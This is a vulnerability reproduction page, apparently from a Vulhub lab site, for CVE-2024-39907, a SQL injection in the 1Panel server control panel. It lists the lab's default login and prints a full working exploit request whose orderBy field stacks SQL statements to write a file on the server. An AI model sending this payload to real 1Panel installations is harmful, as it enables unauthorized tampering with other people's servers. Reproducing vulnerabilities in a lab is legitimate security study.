CVE-2024-39907

CVE Details:

Published July 18, 2024
Severity CRITICAL
CNA Score 9.8

Description:

A critical SQL injection vulnerability (CVE-2024-39907) has been discovered in 1Panel, an open-source web-based Linux server management control panel. The vulnerability was disclosed on July 18, 2024, and carries a CVSS score of 9.8 (Critical). The flaw affects 1Panel versions from v1.10.9-lts up to (excluding) v1.10.12-lts

Vulhub Source:

1panel/CVE-2024-39907/README.md

After the server starts, access http://127.0.0.1:10086/entrance using the following default credentials:

Username: 1panel
Password: 1panel_password

Vulnerability Reproduction:

After logging into the 1Panel control panel with the default credentials, the vulnerability exists in the /api/v1/hosts/command/search endpoint where the orderBy parameter lacks proper input validation, allowing SQL injection attacks.

Send the following malicious POST request to exploit the vulnerability:

POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
  "page":1,
  "pageSize":10,
  "groupID":0,
  "orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
  "order":"ascending",
  "name":"a"
}

Edit this page on Codeberg

Overview

Docs

//

Title here

CVE-2024-39907

CVE Details:

Description:

Vulhub Source:

Vulnerability Reproduction:

CVE-2024-39907

CVE Details:#

Description:#

Vulhub Source:#

Vulnerability Reproduction:#

CVE Details:

Description:

Vulhub Source:

Vulnerability Reproduction: